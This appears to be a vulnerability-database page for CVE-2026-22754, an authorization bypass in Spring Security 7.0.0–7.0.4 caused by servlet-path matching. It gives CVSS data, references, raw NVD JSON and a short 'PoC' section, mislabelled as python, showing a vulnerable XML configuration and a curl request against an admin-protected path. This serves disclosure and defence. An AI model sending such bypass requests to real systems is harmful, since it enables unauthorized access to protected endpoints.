CVE-2026-22754

Description

Vulnerability in Spring Spring Security. If an application uses <sec:intercept-url servlet-path="/servlet-path" pattern="/endpoint/**"/> to define the servlet path for computing a path matcher, then the servlet path is not included and the related authorization rules are not exercised. This can lead to an authorization bypass.This issue affects Spring Security: from 7.0.0 through 7.0.4.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:* - VULNERABLE

Spring Security 7.0.0 - 7.0.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Vulnerable Configuration Example
// File: security-config.xml
<sec:http>
    <!-- The 'servlet-path' attribute is intended to isolate the matching context -->
    <sec:intercept-url servlet-path="/admin" pattern="/users/**" access="hasRole('ADMIN')" />
</sec:http>

/*
 * Exploit Scenario:
 * Due to the bug, the servlet-path "/admin" is ignored during matching.
 * The request to "/users/**" bypasses the access="hasRole('ADMIN')" check.
 */

// HTTP Request (using curl)
// curl -i http://target.com/admin/users/list

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22754
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22754
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22754/
[4] VulDB https://vuldb.com/cve/CVE-2026-22754
[5] https://spring.io/security/cve-2026-22754

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22754", "sourceIdentifier": "[email protected]", "published": "2026-04-22T06:16:04.270", "lastModified": "2026-04-24T14:16:07.313", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in Spring Spring Security. If an application uses <sec:intercept-url servlet-path=\"/servlet-path\" pattern=\"/endpoint/**\"/> to define the servlet path for computing a path matcher, then the servlet path is not included and the related authorization rules are not exercised. This can lead to an authorization bypass.This issue affects Spring Security: from 7.0.0 through 7.0.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.5", "matchCriteriaId": "0B8A5767-EB43-4E11-8E93-9324B70F7060"}]}]}], "references": [{"url": "https://spring.io/security/cve-2026-22754", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}